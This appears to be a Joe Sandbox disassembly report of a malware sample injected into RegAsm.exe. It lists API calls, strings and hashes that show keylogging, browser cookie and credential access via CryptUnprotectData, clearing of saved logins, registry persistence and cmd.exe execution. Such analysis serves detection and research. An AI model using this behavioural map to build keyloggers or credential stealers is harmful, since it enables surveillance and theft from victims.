                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                • String ID: !D@$okmode$p54
                                                                                • API String ID: 3411444782-144394840
                                                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                APIs
                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                Strings
                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                • API String ID: 1174141254-1980882731
                                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                APIs
                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                Strings
                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                • API String ID: 1174141254-1980882731
                                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                • String ID: Offline Keylogger Started
                                                                                • API String ID: 465354869-4114347211
                                                                                • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                APIs
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                • String ID: Online Keylogger Started
                                                                                • API String ID: 112202259-1258561607
                                                                                • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                • API String ID: 2574300362-2380590389
                                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                • String ID: Connection Timeout
                                                                                • API String ID: 2055531096-499159329
                                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw
                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                • API String ID: 2005118841-1866435925
                                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                                                • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1818849710-4028850238
                                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                • String ID: bad locale name
                                                                                • API String ID: 3628047217-1405518554
                                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHandleLibraryModule
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 662261464-1276376045
                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: p54
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                • String ID: !D@
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: /C $cmd.exe$open
                                                                                APIs
                                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,34,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                • String ID: pth_unenc
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm$_strrchr
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                APIs
                                                                                Strings
                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                                APIs
                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                • String ID: 8SG$exepath$34
                                                                                • API String ID: 4119054056-609515032
                                                                                • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                                                                • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                                                                • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3642004256-0
                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                APIs
                                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
